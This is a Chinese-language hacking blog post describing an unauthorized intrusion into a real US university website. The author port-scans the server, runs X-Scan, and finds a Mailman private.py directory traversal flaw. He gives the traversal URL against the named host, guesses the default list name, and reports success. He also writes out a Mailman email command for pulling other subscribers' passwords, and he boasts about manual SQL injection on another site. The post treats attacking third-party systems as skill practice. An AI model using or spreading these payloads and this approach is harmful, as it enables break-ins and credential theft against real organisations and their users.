当前位置: 首页 > 工具软件 > Mailman > 使用案例 >

简述某次拿下外国大学网站(Mailman private.py 目录跳转漏洞)

司徒修能
2023-12-01
这次说个端口的。
    很多人觉得X-Scan过时了,几乎没有人用X-Scan了。如果某些小黑兴起,想搞下国外网站,不是拿着小黑、明小子一顿乱扫就是工具的狂轰。一点技术含量都没有,实在让人无奈。
    前几天还是前几个小时,tank还问我,怎么php的手工注入语句那么简单?我说样子简单不代表难度简单。在中国,只要是存在注入点的网站几乎都被入侵遍了,但是细数他们的手法,还是工具,或者是泛滥的0day。再看一个实际点的。今晚碰上一个有注入点的asp网站。但是用工具扫,全错误。那些用工具的小黑们,我只想说我瞧不起你们。这种情况我用原始的手工asp注入,联合查询,大约二十分钟,密码出来了。
    进去,网站干干净净,没被入侵过……无奈、、、、、
    说实话,这个手工asp联合查询注入并不难,三张图四个url结束战斗,居然。、。、、呵呵。
    闲话休扯,回到正题。
    今晚和小白搞美国的edu,说说其中的一个例子。
    ne.oregonstate.edu
    简单扫了下服务器,发现开着
    www:443
    www:8000
    ftp:21
    www:80
    ssh:22
    这几个端口,我对使用www协议的443端口很好奇,于是访问:
    http://ne.oregonstate.edu:443结果出错了……晕。再一想,呵呵,是https
    https://ne.oregonstate.edu就看到界面了
    输入https://ne.oregonstate.edu/robots.txt
    看到这些东西:
    User-agent: *
    Disallow: /administrator/
    Disallow: /cache/
    Disallow: /components/
    Disallow: /images/
    Disallow: /includes/
    Disallow: /installation/
    Disallow: /language/
    Disallow: /libraries/
    Disallow: /media/
    Disallow: /modules/
    Disallow: /plugins/
    Disallow: /templates/
    Disallow: /tmp/
    Disallow: /xmlrpc/
    Disallow: /*?
    Disallow: /*/resources/
    Disallow: /classes/eecs/fall2009/cs515/
    复制代码
    访问目录administrator无效。显然根据第一幅图,这是个新建的ssl网站。
    好吧,终于打开的X-Scan(下载地址:http://www.heibai.net/download/Soft/Soft_3870.htm),扫,漏洞,maiman
    很多人不喜欢用X-Scan的原因是X-Scan是款检测软件而不是入侵软件。其实这种软件比入侵软件有深度,更难得,让人学会分析,让人不会迷失在工具中成为一个真正的傻瓜。
    检测报告是这么说的:
    Mailman private.py 目录跳转漏洞
    目标主机运行着 Mailman 邮件列表服务
    其存Cgi/private.py存在目录跳转漏洞。 该漏洞在当Web服务没有过滤URL上额外的斜杠时会出现如 Apache 1.3.x,漏洞导致允许列表上的用户利用特殊的web请求,以web服务的权限获取主机上的任意文件, 包括储存在主机上的任意用户的 email 地址,密码
    ***** Nessus 探测该主机存在此漏洞
    ***** 通过安装在该主机上的 Mailman版本号
    **** .
    参见: http://lists.netsys.com/pipermail/full-disclosure/2005-February/031562.html
&nb
sp; 解决方案 : 尽快更新至 Mailman 2.1.6 或通过前面url中的描述进行修补
    风险等级 : 高
    X-Scan中文没有测试地址。实际的测试地址是:
    http://$target/mailman/private/$listname/…/…///mailman?username=$user&password=$pass
    换成实际网站就是
    https://ne.oregonstate.edu/mailman/private/$listname/…/…///mailman?username=$user&password=$pass
    不过提示列表错误。
    下面要做的就是猜邮件列表。跟注入猜表段是一样的
    https://ne.oregonstate.edu/mailman/private/$listname/…/…///mailman?username=$user&password=$pass
    里面的$listname换掉,换成表名,我猜admin、root、newlist猜了半天,看配置方法:
1 安装邮件列表程序
    apt-get install mailman
    2 修改配置 /etc/mailman/mm_cfg.py 此服务器采用exim4作为邮件服务
    DEFAULT_EMAIL_HOST = 'lists.mydomain.com'
    DEFAULT_URL_HOST = 'www.mydomain.com'
    MTA = None
3 添加默认的邮件列表   newlist mailman
    默认是mailman,输入mailman试试
    https://ne.oregonstate.edu/mailman/private/mailman/…/…///mailman?username=$user&password=$pass
    居然成功了……郁闷死……
    下面就是把任意一个存在的用户名和密码带入url里面的&user和$pass带进去,就可以
    以web服务的权限获取主机上的任意文件, 包括储存在主机上的任意用户的 email 地址,密码
    至于后台“找回密码”,数据库XX等等,随你自己好了。
    不过猜密码貌似也不是很难,虽然我还没成功。今天已经凌晨五点了。,扛不住了
    Mailman密码遍历
    这个目标漏洞存在于运行Mailman邮件列表软件的版本
    允许一个列表用户遍历任何一个其他用户的密码
    通过向服务器发送特别制作的邮件信息的途径。
    发送给$listnamerequest@target一个消息,包括一下几行:
    password address=$victim
    password address=$subscriber
    复制代码
    将返回列表$listname的为$victim和$subscriber的密码。
    注意:Nessus已经确定这个攻击仅存在于通过查看目标机器上安装的Mailman版本号的方式。
    $list已经猜出来了……
    我承认这些都是建立在别人基础上的。不过总好过被人说烂了的注入攻击还有什么乱七八糟的要强吧?至少我觉得很锻炼人的渗透和分析能力。
    而其技术含量总好过那些整天拿着asp网站不放的文章要好的多吧?
 类似资料: